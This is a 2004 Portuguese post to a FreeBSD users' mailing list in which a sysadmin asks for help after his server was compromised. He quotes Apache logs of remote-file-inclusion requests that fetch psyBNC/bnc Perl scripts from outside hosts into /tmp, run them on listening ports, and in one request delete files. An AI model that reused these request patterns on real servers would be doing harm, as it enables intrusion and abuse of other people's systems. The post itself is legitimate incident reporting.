[FUGSPBR] problema de seguranca!!
Martin Augusto
martin em newsite.com.br
Ter Jul 13 16:24:01 BRT 2004
Olah pessoal,
Um do servidores aqui estah sendo acessado remotamente por um individuo que,
de alguma maneira que desconheco, vem executando comandos via http,
utilizando-se do usuario www. Recentemente ele baixou e rodou diversos
scripts em perl, como bncs por exemplo. Encontrei ainda outros arquivos,
como exploits para php, binario de linux no /tmp e em diretorios do website
hospedado.
Vejam o log do apache:
httpd-access.log:shasta069242.ig.com.br - - [02/Jul/2004:22:15:04 -0300]
"GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=uname%20-a;cd%20/tmp%20;%20fetch%20http://ircmortos.hpg.ig.com.br/psybnc.perl%20;%20perl%20psybnc.perl%208888%20;%20rm%20-rf%20*
HTTP/1.1" 200 5000 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
DigExt)"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:03 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;wget%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:04 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;wget%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:12 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;ftp%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:14 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;ftp%20http://geocities.yahoo.com.br/malapunk/bnc.pl.txt
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:35 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%2044444
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:08:36 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%2044444
HTTP/1.1" 200 4360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:09:22 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%202525
HTTP/1.1" 200 4269 "-" "iexplore.exe"
httpd-access.log:201-003-141-108.nhoce7005.dsl.brasiltelecom.net.br - -
[08/Jul/2004:22:09:23 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg&cmd=cd%20/tmp;perl%20bnc.pl.txt%202525
HTTP/1.1" 200 4359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
.NET CLR 1.1.4322)"
httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:08 -0300]
"GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;fetch%20http://farpador.com/bnc.pl
HTTP/1.0" 200 4496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:14 -0300]
"GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;perl%20bnc.pl%208000
HTTP/1.0" 200 4427 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
httpd-access.log:waverouter.censa.com.br - - [09/Jul/2004:19:53:35 -0300]
"GET
/*protegido*/index.php?path=http://www.packetx.org/cmd.gif?&cmd=cd%20/tmp;perl%20bnc.pl%208080
HTTP/1.0" 200 4504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
httpd-access.log:201009221110.user.veloxzone.com.br - -
[12/Jul/2004:16:55:31 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=cd%20/tmp;perl%20bnc.pl%206666
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET
CLR 1.1.4322)"
httpd-access.log:201009221110.user.veloxzone.com.br - -
[12/Jul/2004:16:56:21 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=cd%20/tmp;perl%20bnc.pl%208080
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET
CLR 1.1.4322)"
httpd-access.log:201009221110.user.veloxzone.com.br - -
[12/Jul/2004:16:59:42 -0300] "GET
/*protegido*/index.php?path=http://teranova.fr/2003/lila.jpg?&cmd=perl%20/tmp/bnc.pl%2080
HTTP/1.1" 200 4269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET
CLR 1.1.4322)"
httpd-error.log:Não consegui escutar na porta 8888: Address already in use
at psybnc.perl line 128.
Verifiquei o arquivo /*protegido*/index.php e eh o php original do site
hospedado no servidor.
Alguem sabe o que pode estar possibilitando isso? Poderia ser por causa a
variavel register_globals do php, que deixei habilitada devido a problemas
com o Uebimiau e com o Squirrelmail?
Dados:
apache-1.3.31_2 The extremely popular Apache http server. Very fast,
very
mod_php4-4.3.4_2,1 PHP Apache Module
FreeBSD 5.2.1
Qualquer ajuda eh muito bem vinda,
Um abraco,
Martin Augusto
________________________________________________
Message sent using Mail
Newsite 2004
_______________________________________________________________
Para enviar um novo email para a lista: fugspbr em fugspbr.org
Sair da Lista: http://lists.fugspbr.org/listinfo.cgi
Historico: http://www4.fugspbr.org/lista/html/FUG-BR/
Mais detalhes sobre a lista de discussão freebsd